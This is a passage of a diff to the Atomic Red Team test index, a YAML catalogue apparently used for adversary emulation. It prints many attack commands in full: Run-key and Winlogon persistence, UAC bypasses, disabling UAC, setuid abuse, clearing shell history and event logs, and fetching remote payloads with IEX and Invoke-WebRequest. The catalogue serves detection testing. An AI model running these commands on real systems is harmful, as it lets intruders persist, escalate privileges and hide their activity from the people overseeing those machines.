com.apple.loginwindow LoginHook -' + ' elevation_required: true name: sh T1547.001: @@ -17815,11 +17815,11 @@ privilege-escalation: command: 'REG ADD "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /V "Atomic Red Team" /t REG_SZ /F /D "#{command_to_execute}" -' + ' cleanup_command: 'REG DELETE "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /V "Atomic Red Team" /f >nul 2>&1 -' + ' name: command_prompt - name: Reg Key RunOnce auto_generated_guid: 554cbd88-cde1-4b56-8168-0be552eed9eb @@ -17837,11 +17837,11 @@ privilege-escalation: command: 'REG ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnceEx\0001\Depend /v 1 /d "#{thing_to_execute}" -' + ' cleanup_command: 'REG DELETE HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnceEx\0001\Depend /v 1 /f >nul 2>&1 -' + ' name: command_prompt elevation_required: true - name: PowerShell Registry RunOnce @@ -17867,7 +17867,7 @@ privilege-escalation: cleanup_command: 'Remove-ItemProperty -Path #{reg_key_path} -Name "NextRun" -Force -ErrorAction Ignore -' + ' name: powershell elevation_required: true - name: Suspicious vbs file run from startup Folder @@ -18108,7 +18108,7 @@ privilege-escalation: description: 'Upon successful execution, cmd.exe will create a scheduled task to spawn cmd.exe at 20:10. -' + ' supported_platforms: - windows input_arguments: @@ -18125,10 +18125,10 @@ privilege-escalation: elevation_required: false command: 'SCHTASKS /Create /SC ONCE /TN spawn /TR #{task_command} /ST #{time} -' + ' cleanup_command: 'SCHTASKS /Delete /TN spawn /F >nul 2>&1 -' + ' - name: Scheduled task Remote auto_generated_guid: 2e5eac3e-327b-4a88-a0c0-c4057039a8dd description: | @@ -18164,11 +18164,11 @@ privilege-escalation: command: 'SCHTASKS /Create /S #{target} /RU #{user_name} /RP #{password} /TN "Atomic task" /TR "#{task_command}" /SC daily /ST #{time} -' + ' cleanup_command: 'SCHTASKS /Delete /S #{target} /U #{user_name} /P #{password} /TN "Atomic task" /F >nul 2>&1 -' + ' - name: Powershell Cmdlet Scheduled Task auto_generated_guid: af9fd58f-c4ac-4bf2-a9ba-224b71ff25fd description: | @@ -18190,7 +18190,7 @@ privilege-escalation: cleanup_command: 'Unregister-ScheduledTask -TaskName "AtomicTask" -confirm:$false >$null 2>&1 -' + ' - name: Task Scheduler via VBA auto_generated_guid: ecd3fa21-7792-41a2-8726-2c5c673414d3 description: | @@ -18207,7 +18207,7 @@ privilege-escalation: dependencies: - description: 'Microsoft #{ms_product} must be installed -' + ' prereq_command: | try { New-Object -COMObject "#{ms_product}.Application" | Out-Null @@ -18218,7 +18218,7 @@ privilege-escalation: get_prereq_command: 'Write-Host "You will need to install Microsoft #{ms_product} manually to meet this requirement" -' + ' executor: command: "[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12\nIEX (iwr \"https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1204.002/src/Invoke-MalDoc.ps1\" @@ -18231,7 +18231,7 @@ privilege-escalation: login from XML by leveraging WMI class PS_ScheduledTask. Does the same thing as Register-ScheduledTask cmdlet behind the scenes. -' + ' supported_platforms: - windows executor: @@ -18243,7 +18243,7 @@ privilege-escalation: cleanup_command: 'Unregister-ScheduledTask -TaskName "T1053_005_WMI" -confirm:$false >$null 2>&1 -' + ' T1053: technique: id: attack-pattern--35dd844a-b219-4e2b-a6bb-efa9a75995a9 @@ -18379,7 +18379,7 @@ privilege-escalation: sets it as the screensaver so it will execute for persistence. Requires a reboot and logon. -' + ' supported_platforms: - windows input_arguments: @@ -18636,7 +18636,7 @@ privilege-escalation: description: 'Change Service registry ImagePath of a bengin service to a malicious file -' + ' supported_platforms: - windows input_arguments: @@ -18656,22 +18656,22 @@ privilege-escalation: dependencies: - description: 'The service must exist (#{weak_service_name}) -' + ' prereq_command: 'if (Get-Service #{weak_service_name}) {exit 0} else {exit 1} -' + ' get_prereq_command: 'sc.exe create #{weak_service_name} binpath= "#{weak_service_path}" -' + ' executor: command: 'reg.exe add "HKLM\SYSTEM\CurrentControlSet\Services\#{weak_service_name}" /f /v ImagePath /d "#{malicious_service_path}" -' + ' cleanup_command: 'sc.exe delete #{weak_service_name} -' + ' name: command_prompt T1548.001: technique: @@ -18727,7 +18727,7 @@ privilege-escalation: description: 'Make, change owner, and change file attributes on a C source code file -' + ' supported_platforms: - macos - linux @@ -18753,7 +18753,7 @@ privilege-escalation: auto_generated_guid: 759055b3-3885-4582-a8ec-c00c9d64dd79 description: 'This test sets the SetUID flag on a file in Linux and macOS. -' + ' supported_platforms: - macos - linux @@ -18769,14 +18769,14 @@ privilege-escalation: sudo chmod u+s #{file_to_setuid} cleanup_command: 'sudo rm #{file_to_setuid} -' + ' name: sh elevation_required: true - name: Set a SetGID flag on file auto_generated_guid: db55f666-7cba-46c6-9fe6-205a05c3242c description: 'This test sets the SetGID flag on a file in Linux and macOS. -' + ' supported_platforms: - macos - linux @@ -18792,7 +18792,7 @@ privilege-escalation: sudo chmod g+s #{file_to_setuid} cleanup_command: 'sudo rm #{file_to_setuid} -' + ' name: sh elevation_required: true - name: Make and modify capabilities of a binary @@ -18824,7 +18824,7 @@ privilege-escalation: description: 'This test gives a file the capability to set UID without using flags. -' + ' supported_platforms: - linux input_arguments: @@ -18838,7 +18838,7 @@ privilege-escalation: sudo setcap cap_setuid=ep #{file_to_setcap} cleanup_command: 'rm #{file_to_setcap} -' + ' name: sh elevation_required: true T1547.009: @@ -18912,7 +18912,7 @@ privilege-escalation: #{shortcut_file_path} cleanup_command: 'del -f #{shortcut_file_path} >nul 2>&1 -' + ' name: command_prompt - name: Create shortcut to cmd in startup folders auto_generated_guid: cfdc954d-4bb0-4027-875b-a1893ce406f2 @@ -19013,10 +19013,10 @@ privilege-escalation: executor: command: 'sudo touch /Library/StartupItems/EvilStartup.plist -' + ' cleanup_command: 'sudo rm /Library/StartupItems/EvilStartup.plist -' + ' name: sh elevation_required: true T1548.003: @@ -19084,7 +19084,7 @@ privilege-escalation: auto_generated_guid: 150c3a08-ee6e-48a6-aeaf-3659d24ceb4e description: 'Common Sudo enumeration methods. -' + ' supported_platforms: - macos - linux @@ -19098,7 +19098,7 @@ privilege-escalation: This is dangerous to modify without using ''visudo'', do not do this on a production system. -' + ' supported_platforms: - macos - linux @@ -19113,7 +19113,7 @@ privilege-escalation: description: 'Sets sudo caching tty_tickets value to disabled. This is dangerous to modify without using ''visudo'', do not do this on a production system. -' + ' supported_platforms: - macos - linux @@ -19219,7 +19219,7 @@ privilege-escalation: description: 'This test creates a Systemd service unit file and enables it as a service. -' + ' supported_platforms: - linux input_arguments: @@ -19292,15 +19292,15 @@ privilege-escalation: dependencies: - description: 'System must be Ubuntu ,Kali OR CentOS. -' + ' prereq_command: 'if [ $(cat /etc/os-release | grep -i ID=ubuntu) ] || [ $(cat /etc/os-release | grep -i ID=kali) ] || [ $(cat /etc/os-release | grep -i ''ID="centos"'') ]; then exit /b 0; else exit /b 1; fi; -' + ' get_prereq_command: 'echo Please run from Ubuntu ,Kali OR CentOS. -' + ' executor: name: bash elevation_required: true @@ -19452,20 +19452,20 @@ privilege-escalation: dependencies: - description: 'Check if systemd-run exists on the machine -' + ' prereq_command: 'if [ -x "$(command -v systemd-run)" ]; then exit 0; else exit 1; fi; -' + ' get_prereq_command: 'echo "Install systemd on the machine."; exit 1; -' + ' executor: elevation_required: false command: 'systemd-run --user --unit=Atomic-Red-Team --on-calendar ''*:0/1'' /bin/sh -c ''echo "$(date) $(whoami)" >>/tmp/log'' -' + ' cleanup_command: | systemctl --user stop Atomic-Red-Team.service systemctl --user stop Atomic-Red-Team.timer @@ -19482,20 +19482,20 @@ privilege-escalation: dependencies: - description: 'Check if systemd-run exists on the machine -' + ' prereq_command: 'if [ -x "$(command -v systemd-run)" ]; then exit 0; else exit 1; fi; -' + ' get_prereq_command: 'echo "Install systemd on the machine."; exit 1; -' + ' executor: elevation_required: true command: 'systemd-run --unit=Atomic-Red-Team --on-calendar ''*:0/1'' /bin/sh -c ''echo "$(date) $(whoami)" >>/tmp/log'' -' + ' cleanup_command: | systemctl stop Atomic-Red-Team.service systemctl stop Atomic-Red-Team.timer @@ -19967,7 +19967,7 @@ privilege-escalation: auto_generated_guid: 94500ae1-7e31-47e3-886b-c328da46872f description: 'Adds a command to the .bash_profile file of the current user -' + ' supported_platforms: - macos - linux @@ -19979,13 +19979,13 @@ privilege-escalation: executor: command: 'echo "#{command_to_add}" >> ~/.bash_profile -' + ' name: sh - name: Add command to .bashrc auto_generated_guid: 0a898315-4cfa-4007-bafe-33a4646d115f description: 'Adds a command to the .bashrc file of the current user -' + ' supported_platforms: - macos - linux @@ -19997,7 +19997,7 @@ privilege-escalation: executor: command: 'echo "#{command_to_add}" >> ~/.bashrc -' + ' name: sh T1055.014: technique: @@ -20432,10 +20432,10 @@ privilege-escalation: dependencies: - description: 'Service binary must exist on disk at specified location (#{binary_path}) -' + ' prereq_command: 'if (Test-Path #{binary_path}) {exit 0} else {exit 1} -' + ' get_prereq_command: | New-Item -Type Directory (split-path #{binary_path}) -ErrorAction ignore | Out-Null Invoke-WebRequest "https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1543.003/bin/AtomicService.exe" -OutFile "#{binary_path}" @@ -20468,10 +20468,10 @@ privilege-escalation: dependencies: - description: 'Service binary must exist on disk at specified location (#{binary_path}) -' + ' prereq_command: 'if (Test-Path #{binary_path}) {exit 0} else {exit 1} -' + ' get_prereq_command: | New-Item -Type Directory (split-path #{binary_path}) -ErrorAction ignore | Out-Null Invoke-WebRequest "https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1543.003/bin/AtomicService.exe" -OutFile "#{binary_path}" @@ -20567,11 +20567,11 @@ privilege-escalation: command: 'Set-ItemProperty "HKCU:\Software\Microsoft\Windows NT\CurrentVersion\Winlogon\" "Shell" "explorer.exe, #{binary_to_execute}" -Force -' + ' cleanup_command: 'Remove-ItemProperty -Path "HKCU:\Software\Microsoft\Windows NT\CurrentVersion\Winlogon\" -Name "Shell" -Force -ErrorAction Ignore -' + ' name: powershell - name: Winlogon Userinit Key Persistence - PowerShell auto_generated_guid: fb32c935-ee2e-454b-8fa3-1c46b42e8dfb @@ -20590,11 +20590,11 @@ privilege-escalation: command: 'Set-ItemProperty "HKCU:\Software\Microsoft\Windows NT\CurrentVersion\Winlogon\" "Userinit" "Userinit.exe, #{binary_to_execute}" -Force -' + ' cleanup_command: 'Remove-ItemProperty -Path "HKCU:\Software\Microsoft\Windows NT\CurrentVersion\Winlogon\" -Name "Userinit" -Force -ErrorAction Ignore -' + ' name: powershell - name: Winlogon Notify Key Logon Persistence - PowerShell auto_generated_guid: d40da266-e073-4e5a-bb8b-2b385023e5f9 @@ -20616,7 +20616,7 @@ privilege-escalation: cleanup_command: 'Remove-Item "HKCU:\Software\Microsoft\Windows NT\CurrentVersion\Winlogon\Notify" -Force -ErrorAction Ignore -' + ' name: powershell T1547.013: technique: @@ -21110,10 +21110,10 @@ defense-evasion: command: 'bitsadmin.exe /transfer /Download /priority Foreground #{remote_file} #{local_file} -' + ' cleanup_command: 'del #{local_file} >nul 2>&1 -' + ' name: command_prompt - name: Bitsadmin Download (PowerShell) auto_generated_guid: f63b8bc4-07e5-4112-acba-56f646f3f0bc @@ -21137,10 +21137,10 @@ defense-evasion: command: 'Start-BitsTransfer -Priority foreground -Source #{remote_file} -Destination #{local_file} -' + ' cleanup_command: 'Remove-Item #{local_file} -ErrorAction Ignore -' + ' name: powershell - name: Persist, Download, & Execute auto_generated_guid: 62a06ec5-5754-47d2-bcfc-123d8314c6ae @@ -21178,7 +21178,7 @@ defense-evasion: bitsadmin.exe /complete #{bits_job_name} cleanup_command: 'del #{local_file} >nul 2>&1 -' + ' name: command_prompt - name: Bits download using desktopimgdownldr.exe (cmd) auto_generated_guid: afb5e09e-e385-4dee-9a94-6ee60979d114 @@ -21210,10 +21210,10 @@ defense-evasion: command: 'set "#{download_path}" && cmd /c desktopimgdownldr.exe /lockscreenurl:#{remote_file} /eventName:desktopimgdownldr -' + ' cleanup_command: 'del #{cleanup_path}\#{cleanup_file} >nul 2>&1 -' + ' name: command_prompt T1027.001: technique: @@ -21303,20 +21303,20 @@ defense-evasion: dependencies: - description: 'The binary must exist on disk at specified location (#{file_to_pad}) -' + ' prereq_command: 'if [ -f #{file_to_pad} ]; then exit 0; else exit 1; fi; -' + ' get_prereq_command: 'cp /bin/ls #{file_to_pad} -' + ' executor: command: 'dd if=/dev/zero bs=1 count=1 >> #{file_to_pad} -' + ' cleanup_command: 'rm #{file_to_pad} -' + ' name: sh T1542.003: technique: @@ -21549,7 +21549,7 @@ defense-evasion: cmd.exe /c eventvwr.msc cleanup_command: 'reg.exe delete hkcu\software\classes\mscfile /f >nul 2>&1 -' + ' name: command_prompt - name: Bypass UAC using Event Viewer (PowerShell) auto_generated_guid: a6ce9acf-842a-4af6-8f79-539be7608e2b @@ -21571,7 +21571,7 @@ defense-evasion: cleanup_command: 'Remove-Item "HKCU:\software\classes\mscfile" -force -Recurse -ErrorAction Ignore -' + ' name: powershell - name: Bypass UAC using Fodhelper auto_generated_guid: 58f641ea-12e3-499a-b684-44dee46bd182 @@ -21593,7 +21593,7 @@ defense-evasion: cleanup_command: 'reg.exe delete hkcu\software\classes\ms-settings /f >nul 2>&1 -' + ' name: command_prompt - name: Bypass UAC using Fodhelper - PowerShell auto_generated_guid: 3f627297-6c38-4e7d-a278-fc2563eaaeaa @@ -21616,7 +21616,7 @@ defense-evasion: cleanup_command: 'Remove-Item "HKCU:\software\classes\ms-settings" -force -Recurse -ErrorAction Ignore -' + ' name: powershell - name: Bypass UAC using ComputerDefaults (PowerShell) auto_generated_guid: 3c51abf2-44bf-42d8-9111-dc96ff66750f @@ -21639,7 +21639,7 @@ defense-evasion: cleanup_command: 'Remove-Item "HKCU:\software\classes\ms-settings" -force -Recurse -ErrorAction Ignore -' + ' name: powershell elevation_required: true - name: Bypass UAC by Mocking Trusted Directories @@ -21687,7 +21687,7 @@ defense-evasion: cleanup_command: 'Remove-Item -Path "HKCU:\Software\Classes\Folder" -Recurse -Force -ErrorAction Ignore -' + ' name: powershell - name: Disable UAC using reg.exe auto_generated_guid: 9e8af564-53ec-407e-aaa8-3cb20c3af7f9 @@ -21700,11 +21700,11 @@ defense-evasion: command: 'reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWORD /d 0 /f -' + ' cleanup_command: 'reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWORD /d 1 /f -' + ' name: command_prompt elevation_required: true - name: Bypass UAC using SilentCleanup task @@ -21751,7 +21751,7 @@ defense-evasion: dependencies: - description: 'UACME executable must exist on disk at specified location (#{uacme_exe}) -' + ' prereq_command: | $tempPath = cmd /c echo #{uacme_exe} if (Test-Path "$tempPath") {exit 0} else {exit 1} @@ -21762,7 +21762,7 @@ defense-evasion: executor: command: '"#{uacme_exe}" -' + ' cleanup_command: | powershell Stop-Process -Name cmd -Force -ErrorAction Ignore powershell Stop-Process -Name mmc -Force -ErrorAction Ignore @@ -21787,7 +21787,7 @@ defense-evasion: dependencies: - description: 'UACME executable must exist on disk at specified location (#{uacme_exe}) -' + ' prereq_command: | $tempPath = cmd /c echo #{uacme_exe} if (Test-Path "$tempPath") {exit 0} else {exit 1} @@ -21798,7 +21798,7 @@ defense-evasion: executor: command: '"#{uacme_exe}" -' + ' cleanup_command: | powershell Stop-Process -Name cmd -Force -ErrorAction Ignore powershell Stop-Process -Name mmc -Force -ErrorAction Ignore @@ -21822,7 +21822,7 @@ defense-evasion: dependencies: - description: 'UACME executable must exist on disk at specified location (#{uacme_exe}) -' + ' prereq_command: | $tempPath = cmd /c echo #{uacme_exe} if (Test-Path "$tempPath") {exit 0} else {exit 1} @@ -21833,7 +21833,7 @@ defense-evasion: executor: command: '"#{uacme_exe}" -' + ' cleanup_command: | powershell Stop-Process -Name cmd -Force -ErrorAction Ignore powershell Stop-Process -Name mmc -Force -ErrorAction Ignore @@ -21858,7 +21858,7 @@ defense-evasion: dependencies: - description: 'UACME executable must exist on disk at specified location (#{uacme_exe}) -' + ' prereq_command: | $tempPath = cmd /c echo #{uacme_exe} if (Test-Path "$tempPath") {exit 0} else {exit 1} @@ -21869,7 +21869,7 @@ defense-evasion: executor: command: '"#{uacme_exe}" -' + ' cleanup_command: | powershell Stop-Process -Name cmd -Force -ErrorAction Ignore powershell Stop-Process -Name mmc -Force -ErrorAction Ignore @@ -21893,7 +21893,7 @@ defense-evasion: dependencies: - description: 'UACME executable must exist on disk at specified location (#{uacme_exe}) -' + ' prereq_command: | $tempPath = cmd /c echo #{uacme_exe} if (Test-Path "$tempPath") {exit 0} else {exit 1} @@ -21904,7 +21904,7 @@ defense-evasion: executor: command: '"#{uacme_exe}" -' + ' cleanup_command: | powershell Stop-Process -Name cmd -Force -ErrorAction Ignore powershell Stop-Process -Name mmc -Force -ErrorAction Ignore @@ -21928,7 +21928,7 @@ defense-evasion: dependencies: - description: 'UACME executable must exist on disk at specified location (#{uacme_exe}) -' + ' prereq_command: | $tempPath = cmd /c echo #{uacme_exe} if (Test-Path "$tempPath") {exit 0} else {exit 1} @@ -21939,7 +21939,7 @@ defense-evasion: executor: command: '"#{uacme_exe}" -' + ' cleanup_command: | powershell Stop-Process -Name cmd -Force -ErrorAction Ignore powershell Stop-Process -Name mmc -Force -ErrorAction Ignore @@ -21964,7 +21964,7 @@ defense-evasion: dependencies: - description: 'UACME executable must exist on disk at specified location (#{uacme_exe}) -' + ' prereq_command: | $tempPath = cmd /c echo #{uacme_exe} if (Test-Path "$tempPath") {exit 0} else {exit 1} @@ -21975,7 +21975,7 @@ defense-evasion: executor: command: '"#{uacme_exe}" -' + ' cleanup_command: | powershell Stop-Process -Name cmd -Force -ErrorAction Ignore powershell Stop-Process -Name mmc -Force -ErrorAction Ignore @@ -22000,7 +22000,7 @@ defense-evasion: dependencies: - description: 'UACME executable must exist on disk at specified location (#{uacme_exe}) -' + ' prereq_command: | $tempPath = cmd /c echo #{uacme_exe} if (Test-Path "$tempPath") {exit 0} else {exit 1} @@ -22011,7 +22011,7 @@ defense-evasion: executor: command: '"#{uacme_exe}" -' + ' cleanup_command: | powershell Stop-Process -Name cmd -Force -ErrorAction Ignore powershell Stop-Process -Name mmc -Force -ErrorAction Ignore @@ -22093,7 +22093,7 @@ defense-evasion: description: 'Adversaries may supply CMSTP.exe with INF files infected with malicious commands -' + ' supported_platforms: - windows input_arguments: @@ -22105,24 +22105,24 @@ defense-evasion: dependencies: - description: 'INF file must exist on disk at specified location (#{inf_file_path}) -' + ' prereq_command: 'if (Test-Path #{inf_file_path}) {exit 0} else {exit 1} -' + ' get_prereq_command: | New-Item -Type Directory (split-path #{inf_file_path}) -ErrorAction ignore | Out-Null Invoke-WebRequest "https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1218.003/src/T218.003.inf" -OutFile "#{inf_file_path}" executor: command: 'cmstp.exe /s #{inf_file_path} -' + ' name: command_prompt - name: CMSTP Executing UAC Bypass auto_generated_guid: 748cb4f6-2fb3-4e97-b7ad-b22635a09ab0 description: 'Adversaries may invoke cmd.exe (or other malicious commands) by embedding them in the RunPreSetupCommandsSection of an INF file -' + ' supported_platforms: - windows input_arguments: @@ -22134,17 +22134,17 @@ defense-evasion: dependencies: - description: 'INF file must exist on disk at specified location (#{inf_file_uac}) -' + ' prereq_command: 'if (Test-Path #{inf_file_uac}) {exit 0} else {exit 1} -' + ' get_prereq_command: | New-Item -Type Directory (split-path #{inf_file_uac}) -ErrorAction ignore | Out-Null Invoke-WebRequest "https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1218.003/src/T1218.003_uacbypass.inf" -OutFile "#{inf_file_uac}" executor: command: 'cmstp.exe /s #{inf_file_uac} /au -' + ' name: command_prompt T1574.012: technique: @@ -22255,7 +22255,7 @@ defense-evasion: - description: "#{file_name} must be present\n" prereq_command: 'if (Test-Path #{file_name}) {exit 0} else {exit 1} -' + ' get_prereq_command: | New-Item -Type Directory (split-path #{file_name}) -ErrorAction ignore | Out-Null Invoke-WebRequest "https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1574.012/bin/T1574.012x64.dll" -OutFile "#{file_name}" @@ -22300,7 +22300,7 @@ defense-evasion: - description: "#{file_name} must be present\n" prereq_command: 'if (Test-Path #{file_name}) {exit 0} else {exit 1} -' + ' get_prereq_command: | New-Item -Type Directory (split-path #{file_name}) -ErrorAction ignore | Out-Null Invoke-WebRequest "https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1574.012/bin/T1574.012x64.dll" -OutFile "#{file_name}" @@ -22338,7 +22338,7 @@ defense-evasion: - description: "#{file_name} must be present\n" prereq_command: 'if (Test-Path #{file_name}) {exit 0} else {exit 1} -' + ' get_prereq_command: | New-Item -Type Directory (split-path #{file_name}) -ErrorAction ignore | Out-Null Invoke-WebRequest "https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1574.012/bin/T1574.012x64.dll" -OutFile "#{file_name}" @@ -22422,71 +22422,71 @@ defense-evasion: auto_generated_guid: a934276e-2be5-4a36-93fd-98adbb5bd4fc description: 'Clears bash history via rm -' + ' supported_platforms: - linux - macos executor: command: 'rm ~/.bash_history -' + ' name: sh - name: Clear Bash history (echo) auto_generated_guid: cbf506a5-dd78-43e5-be7e-a46b7c7a0a11 description: 'Clears bash history via rm -' + ' supported_platforms: - linux executor: command: 'echo "" > ~/.bash_history -' + ' name: sh - name: Clear Bash history (cat dev/null) auto_generated_guid: b1251c35-dcd3-4ea1-86da-36d27b54f31f description: 'Clears bash history via cat /dev/null -' + ' supported_platforms: - linux - macos executor: command: 'cat /dev/null > ~/.bash_history -' + ' name: sh - name: Clear Bash history (ln dev/null) auto_generated_guid: 23d348f3-cc5c-4ba9-bd0a-ae09069f0914 description: 'Clears bash history via a symlink to /dev/null -' + ' supported_platforms: - linux - macos executor: command: 'ln -sf /dev/null ~/.bash_history -' + ' name: sh - name: Clear Bash history (truncate) auto_generated_guid: 47966a1d-df4f-4078-af65-db6d9aa20739 description: 'Clears bash history via truncate -' + ' supported_platforms: - linux executor: command: 'truncate -s0 ~/.bash_history -' + ' name: sh - name: Clear history of a bunch of shells auto_generated_guid: 7e6721df-5f08-4370-9255-f06d8a77af4c description: 'Clears the history of a bunch of different shell types by setting the history size to zero -' + ' supported_platforms: - linux - macos @@ -22501,7 +22501,7 @@ defense-evasion: description: 'Clears the history and disable bash history logging of the current shell and future shell sessions -' + ' supported_platforms: - linux - macos @@ -22521,7 +22521,7 @@ defense-evasion: description: 'Using a space before a command causes the command to not be logged in the Bash History file -' + ' supported_platforms: - linux - macos @@ -22536,13 +22536,13 @@ defense-evasion: keeps the ssh client from catching a proper TTY, which is what usually gets logged on lastlog -' + ' supported_platforms: - linux dependencies: - description: 'Install sshpass and create user account used for excuting -' + ' prereq_command: "$(getent passwd testuser1 >/dev/null) && $(which sshpass >/dev/null)\n" get_prereq_command: | @@ -22552,35 +22552,35 @@ defense-evasion: executor: command: 'sshpass -p ''pwd101!'' ssh testuser1@localhost -T hostname -' + ' cleanup_command: 'userdel -f testuser1 -' + ' name: sh - name: Prevent Powershell History Logging auto_generated_guid: 2f898b81-3e97-4abb-bc3f-a95138988370 description: 'Prevents Powershell history -' + ' supported_platforms: - windows executor: command: 'Set-PSReadlineOption –HistorySaveStyle SaveNothing -' + ' name: powershell cleanup_command: Set-PSReadLineOption -HistorySaveStyle SaveIncrementally - name: Clear Powershell History by Deleting History File auto_generated_guid: da75ae8d-26d6-4483-b0fe-700e4df4f037 description: 'Clears Powershell history -' + ' supported_platforms: - windows executor: command: 'Remove-Item (Get-PSReadlineOption).HistorySavePath -' + ' name: powershell T1070.002: technique: @@ -22631,7 +22631,7 @@ defense-evasion: auto_generated_guid: 989cc1b1-3642-4260-a809-54f9dd559683 description: 'Delete system and audit logs -' + ' supported_platforms: - macos - linux @@ -22647,7 +22647,7 @@ defense-evasion: This technique was used by threat actor Rocke during the exploitation of Linux web servers. -' + ' supported_platforms: - linux input_arguments: @@ -22658,14 +22658,14 @@ defense-evasion: executor: command: 'echo 0> /var/spool/mail/#{username} -' + ' name: bash - name: Overwrite Linux Log auto_generated_guid: d304b2dc-90b4-4465-a650-16ddd503f7b5 description: 'This test overwrites the specified log. This technique was used by threat actor Rocke during the exploitation of Linux web servers. -' + ' supported_platforms: - linux input_arguments: @@ -22676,7 +22676,7 @@ defense-evasion: executor: command: 'echo 0> #{log_path} -' + ' name: bash T1070.001: technique: @@ -22744,7 +22744,7 @@ defense-evasion: System.evtx logs at C:\Windows\System32\winevt\Logs and verify that it is now empty. -' + ' supported_platforms: - windows input_arguments: @@ -22755,7 +22755,7 @@ defense-evasion: executor: command: 'wevtutil cl #{log_name} -' + ' name: command_prompt elevation_required: true - name: Delete System Logs Using Clear-EventLog @@ -22784,7 +22784,7 @@ defense-evasion: dependencies: - description: 'Microsoft Word must be installed -' + ' prereq_command: | try { New-Object -COMObject "Word.Application" | Out-Null @@ -22794,7 +22794,7 @@ defense-evasion: get_prereq_command: 'Write-Host "You will need to install Microsoft Word manually to meet this requirement" -' + ' executor: command: | [Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12 @@ -22865,7 +22865,7 @@ defense-evasion: description: 'GCP Service Accounts can be used to gain intial access as well as maintain persistence inside Google Cloud. -' + ' supported_platforms: - google-workspace - windows @@ -22900,20 +22900,20 @@ defense-evasion: cleanup_command: 'gcloud iam service-accounts delete #{service-account-email} --quiet -' + ' dependency_executor_name: gcloud dependencies: - description: 'Requires gcloud -' + ' prereq_command: 'if [ -x "$(command -v gcloud)" ]; then exit 0; else exit 1; fi; -' + ' get_prereq_command: 'echo "Please Install Google Cloud SDK before running this atomic test : https://cloud.google.com/sdk/docs/install" -' + ' T1553.002: technique: external_references: @@ -23160,10 +23160,10 @@ defense-evasion: dependencies: - description: 'C# file must exist on disk at specified location (#{input_file}) -' + ' prereq_command: 'if (Test-Path #{input_file}) {exit 0} else {exit 1} -' + ' get_prereq_command: | New-Item -Type Directory (split-path #{input_file}) -ErrorAction ignore | Out-Null Invoke-WebRequest "https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1027.004/src/calc.cs" -OutFile "#{input_file}" @@ -23171,10 +23171,10 @@ defense-evasion: command: 'C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe /out:#{output_file} #{input_file} -' + ' cleanup_command: 'del #{output_file} >nul 2>&1 -' + ' name: command_prompt - name: Dynamic C# Compile auto_generated_guid: 453614d8-3ba6-4147-acc0-7ec4b3e1faef @@ -23196,24 +23196,24 @@ defense-evasion: dependencies: - description: 'exe file must exist on disk at specified location (#{input_file}) -' + ' prereq_command: 'if (Test-Path #{input_file}) {exit 0} else {exit 1} -' + ' get_prereq_command: 'Invoke-WebRequest https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1027.004/bin/T1027.004_DynamicCompile.exe -OutFile #{input_file} -' + ' executor: command: 'Invoke-Expression #{input_file} -' + ' name: powershell - name: C compile auto_generated_guid: d0377aa6-850a-42b2-95f0-de558d80be57 description: 'Compile a c file with either gcc or clang on Linux or Macos. -' + ' supported_platforms: - linux - macos @@ -23226,14 +23226,14 @@ defense-evasion: dependencies: - description: 'the source file must exist on disk at specified location (#{input_file}) -' + ' prereq_command: 'if (Test-Path #{input_file}) {exit 0} else {exit 1} -' + ' get_prereq_command: 'Invoke-WebRequest https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1027.004/src/T1027-004-test.c -OutFile #{input_file} -' + ' executor: command: | gcc #{input_file} && ./a.out @@ -23243,7 +23243,7 @@ defense-evasion: auto_generated_guid: da97bb11-d6d0-4fc1-b445-e443d1346efe description: 'Compile a c file with either gcc or clang on Linux or Macos. -' + ' supported_platforms: - linux - macos @@ -23256,14 +23256,14 @@ defense-evasion: dependencies: - description: 'the source file must exist on disk at specified location (#{input_file}) -' + ' prereq_command: 'if (Test-Path #{input_file}) {exit 0} else {exit 1} -' + ' get_prereq_command: 'Invoke-WebRequest https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1027.004/src/T1027-004-test.c -OutFile #{input_file} -' + ' executor: command: | g++ #{input_file} && ./a.out @@ -23273,7 +23273,7 @@ defense-evasion: auto_generated_guid: 78bd3fa7-773c-449e-a978-dc1f1500bc52 description: 'Compile a c file with either gcc or clang on Linux or Macos. -' + ' supported_platforms: - linux - macos @@ -23286,18 +23286,18 @@ defense-evasion: dependencies: - description: 'the source file must exist on disk at specified location (#{input_file}) -' + ' prereq_command: 'if (Test-Path #{input_file}) {exit 0} else {exit 1} -' + ' get_prereq_command: 'Invoke-WebRequest https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1027.004/src/T1027-004-test.c -OutFile #{input_file} -' + ' executor: command: 'go run #{input_file} -' + ' name: bash T1218.001: technique: @@ -23377,17 +23377,17 @@ defense-evasion: dependencies: - description: 'The payload must exist on disk at specified location (#{local_chm_file}) -' + ' prereq_command: 'if (Test-Path #{local_chm_file}) {exit 0} else {exit 1} -' + ' get_prereq_command: | New-Item -Type Directory (split-path #{local_chm_file}) -ErrorAction ignore | Out-Null Invoke-WebRequest "https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1218.001/src/T1218.001.chm" -OutFile "#{local_chm_file}" executor: command: 'hh.exe #{local_chm_file} -' + ' name: command_prompt - name: Compiled HTML Help Remote Payload auto_generated_guid: 0f8af516-9818-4172-922b-42986ef1e81d @@ -23404,7 +23404,7 